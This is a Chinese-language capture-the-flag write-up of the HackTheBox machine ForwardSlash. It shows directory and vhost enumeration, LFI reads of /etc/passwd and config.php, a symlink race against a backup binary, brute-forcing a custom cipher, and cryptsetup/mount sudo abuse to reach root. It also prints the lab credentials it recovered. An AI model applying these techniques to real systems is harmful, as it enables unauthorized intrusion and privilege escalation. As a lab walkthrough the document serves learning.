基本信息

端口扫描

常规22和80:

80

需要加一下host:

1
10.10.10.183 forwardslash.htb

扫一下目录:

1
gobuster dir -u http://forwardslash.htb/ -w /usr/share/wordlists/dirb/common.txt -x php,txt

发现一个note.txt:

1
2
3
4
Pain, we were hacked by some skids that call themselves the "Backslash Gang"... I know... That name... 
Anyway I am just leaving this note here to say that we still have that backup site so we should be fine.

-chiv

backup site

根据提示信息以及vhost扫描,找到backup.forwardslash.htb,同样加到hosts里:

1
gobuster vhost -u http://forwardslash.htb/ -w /usr/share/wordlists/dirb/common.txt

注册账号登录进去,这个功能有个可疑的地方:

取消disable测试,发现是post一个url参数:

LFI

这里有一个明显的LFI:

/etc/passwd

根据passwd文件得到两个用户名:

1
2
pain:x:1000:1000:pain:/home/pain:/bin/bash
chiv:x:1001:1001:Chivato,,,:/home/chiv:/bin/bash

config.php

直接读取config.php得到数据库配置信息:

1
2
3
define('DB_USERNAME', 'www-data');
define('DB_PASSWORD', '5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec');
define('DB_NAME', 'site');

api.php

部分文件直接读没权限可以用php伪协议:

dev/index.php

得到chiv账号密码:

1
chiv : N0bodyL1kesBack/

chiv ssh

用这个账号密码能ssh登录chiv,但user.txt在另一个用户目录里:

backup 条件竞争

存在/var/backups目录和/usr/bin/backup程序, 直接使用报错:

根据报错信息,可以利用条件竞争:

1
2
3
cat shell.sh
i=$(backup | grep ERROR | awk '{print $2}');
ln -s /var/backups/config.php.bak /home/chiv/$i;/usr/bin/backup;

得到pain用户密码:

1
2
3
define('DB_USERNAME', 'pain');
define('DB_PASSWORD', 'db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704');
define('DB_NAME', 'site');

user flag

切换到pain用户,得到user.txt:

encryptorinator

在这个目录有一个加密文本和加解密代码:

根据代码写一个解密程序爆破key,获得message:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def decrypt(key, msg):
key = list(key)
msg = list(msg)
for char_key in reversed(key):
for i in reversed(range(len(msg))):
if i == 0:
tmp = ord(msg[i]) - (ord(char_key) + ord(msg[-1]))
else:
tmp = ord(msg[i]) - (ord(char_key) + ord(msg[i-1]))
while tmp < 0:
tmp += 256
msg[i] = chr(tmp)
return ''.join(msg)


ciphertext = open('ciphertext', 'r').read().rstrip()
for i in range(1, 165):
for j in range(33, 127):
key = chr(j) * i
msg = decrypt(key, ciphertext)
if 'the ' in msg or 'be ' in msg or 'and ' in msg or 'of ' in msg :
exit("Key: {0}, Key length: {1}, Msg: {2}".format(key, len(key), msg))

结果:

1
2
python miao.py
Key: ttttttttttttttttt, Key length: 17, Msg: Hl�vF��;�������&you liked my new encryption tool, pretty secure huh, anyway here is the key to the encrypted image from /var/backups/recovery: cB!6%sdH8Lj^@Y*$C2cf

信息

根据结果得到这个加密的img:

1
/var/backups/recovery/encrypted_backup.img

并且sudo -l能够看到当前用户可以无密码cryptsetup以及指定目录mount:

pain用户目录也有个note.txt说明这些:

1
2
3
4
cat note.txt
Pain, even though they got into our server, I made sure to encrypt any important files and then did some crypto magic on the key... I gave you the key in person the other day, so unless these hackers are some crypto experts we should be good to go.

-chiv

decrypt & mount

1
2
3
4
5
sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
mkdir mnt
sudo /bin/mount /dev/mapper/backup ./mnt/
cd mnt/
ls

里面是一个SSH私钥:

root flag

使用这个私钥可以ssh登录root,得到root.txt:

参考资料